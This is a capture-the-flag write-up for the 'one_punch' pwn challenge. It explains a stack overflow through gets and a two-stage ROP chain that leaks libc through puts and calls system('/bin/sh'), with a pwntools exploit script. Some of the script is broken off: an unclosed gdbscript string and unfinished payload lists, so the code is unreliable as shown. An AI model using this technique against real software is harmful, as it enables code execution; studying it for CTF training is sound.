one punch



100 BOFs, 100 UAFs, 100 Race cons and 10 km ROP chain, EVERY SINGLE DAY!!!


Basic file checks

We're given a binary with a ld linker and a libc, first thing we'll do is run pwninit with the provided linker so it can segfaultlessly load the provided libc

 pwninit --bin ./one_punch --libc ./ --ld ./

Next lets do some basic file check

  • FULL RELRO: so overwriting GOT is not an option

  • No Stack Canary: easier for us to do BOFs

  • NX enable: Shellcode is also not an option

  • PIE Enabled: means we have to do some leaking to correctly craft the ROP chains

Next, lets statically analyse the binary using ghidra

Binary Analysis

First the function will check if mapped_region in the .data section is empty, if not it will execute init, we'll take a look at that later. Next we're greeted with an address leak, lets check what that is using gdb-pwndbg

It seems the address is pointing to an address that can be useful as our pop rdi; ret; gadget which will enable our ROP chains.

The init function fills the mapped_region with the value of key which holds the value POWER, GET THE POWER. . Next lets check vuln

Crafting ROP chains

Immediately we see that it's using the gets which will enable our overflow, from here we already get an overview of how we'll exceute the ROP chains. First we'll leak one of the function within the GOT and print it out. We can then subtract that with its corresponding offset to find the Libc base address. we can call system with /bin/sh that's exist within the Libc as follows:

1st Payload:

  1. pop rdi -> GOT puts -> PLT puts -> Main (Eventually will call vuln)

2nd Payload:

  1. pop rdi -> binsh -> system

but there's a twist, vuln will do a a comparison between key and mapped_region . If the two values is not the same, it will exit the program. Below it, the instruction will overwrite the first 21 bytes of mapped_region with 0s. This basically is a check to make sure that vuln can only be called once. To bypass this, we simply have to call init to restore the value. In order to do that we cant return to main after our first BOFs since there's check on mapped_region if the memory is empty. So instead, we need to return to init passing the if statement and eventually will return to vuln through main.

1st Payload:

  1. pop rdi -> GOT puts -> PLT puts -> init

2nd Payload:

  1. pop rdi -> binsh -> system
from pwn import *

# =========================================================
#                          SETUP                         
# =========================================================
exe = './one_punch'
rop = ROP(exe)
elf = context.binary = ELF(exe, checksec=True)
context.log_level = 'debug'
host = ''
port = 31794

def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(host, port, *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)

gdbscript = '''
break *main

io = start()

# =========================================================
#                         ADDRESSES
# =========================================================
# Got manually through cyclic gdb-pwndbg
offset = 120

pop_rdi = int(io.recvline()[24:-1].decode(), 16)
elf.address = pop_rdi - 0x1291
ret = elf.address + 0x101a  
call_init = elf.address + 0x13f4
info('leaked elf base address: %#x', elf.address)

# =========================================================
#                         EXPLOITS
# =========================================================
payload = flat({
    offset: [

# send 1st payload to get puts offset
io.sendlineafter(b'strongest hero?', payload)


# indexing to save puts addr offset in hex form 
got_puts = unpack(io.recvline()[:6].ljust(8, b'\x00'))
info('leaked got_puts: %#x', got_puts)

# obtained manually using $ readelf -s | grep puts
libc_base = got_puts - 0x80ed0  
info('libc_base: %#x', libc_base)

# obtained manually using same method as mentioned above
system_addr = libc_base + 0x50d60
info('system_addr: %#x', system_addr)

# obtained manually using $ strings -a -t x | grep "/bin/sh"
binsh = libc_base + 0x1d8698
info('binsh: %#x', binsh)

# 2nd payload to get shell
payload = flat({
    offset: [

# send 2nd payload to get shell
io.sendlineafter(b'strongest hero?', payload)




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